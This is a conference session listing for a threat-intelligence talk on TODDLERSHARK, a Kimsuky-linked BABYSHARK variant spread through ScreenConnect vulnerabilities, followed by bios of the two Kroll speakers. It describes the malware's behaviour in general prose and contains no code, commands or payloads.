All in the Shark Family: TODDLERSHARK

September 26, 2024 (GMT +8)
10:15
Ballroom 1 & 2
  

The Kroll CTI team, led by Keith, will talk about their analysis of a new malware campaign resembling BABYSHARK, previously associated with the APT group Kimsuky (KTA082). This malware was part of an attempted compromise exploiting vulnerabilities in ConnectWise ScreenConnect, namely CVE-2024-1708 and CVE-2024-1709. These vulnerabilities enable authentication bypass and remote code execution.

The threat actor gained access through ScreenConnect's setup wizard and executed MSHTA with a URL leading to VB-based malware. The malware employed heavy obfuscation and randomly generated code to evade detection. It downloaded a second-stage payload with functionalities including modifying registry keys, stealing system information, and setting up scheduled tasks.

The stolen information was encoded in PEM certificates and exfiltrated to a C2 server. Additionally, the malware created a scheduled task to periodically check for further instructions. The code and behavior of this malware closely resemble BABYSHARK, suggesting it's an iteration of the original.

This malware demonstrates polymorphic behavior, making it challenging to detect. It utilizes legitimate Microsoft binaries for execution and dynamically generates C2 URLs. The use of known vulnerabilities in ScreenConnect highlights the importance of patching systems promptly to prevent exploitation.

Speaker

Keith Wojcieszek Keith Wojcieszek is the global head of threat intelligence in Kroll’s Cyber Risk practice, based in Washington, D.C. office. Keith joined Kroll from the U.S. Secret Service, where he served with distinction for 15 years. Keith founded and leads Kroll’s Cyber Threat Intelligence program, manages a wide range of cybercrime, data loss and incident response investigations and is a trusted advisor to clients involved in compliance-related or sensitive local and global cyber security matters. He also has extensive experience working with international stakeholders on complex transnational investigations and initiatives.

Ely Tingson Ely Tingson is a senior vice president for Cyber Threat Intelligence in the Cyber Risk practice, based in Metro Manila. Carlos leverages more than 10 years of experience in assisting some of the region's most critical national security teams with managing and mitigating their cyber risk.

Prior to joining Kroll, Ely served as Data Protection Officer at the Presidential Security Group (PSG) and led the Technical Surveillance Countermeasures (TSCM) and Electronic Countermeasures (ECM) teams. While at the PSG, he concurrently held the title of cyber security consultant at the National Security Council, Office of the President, Republic of the Philippines. Ely is also a member of the Philippine Military Academy “Mandala” Class of 2006, having earned his commission in the Philippine Army, and served in the 2nd Infantry Division and the Special Operations Command.

« Back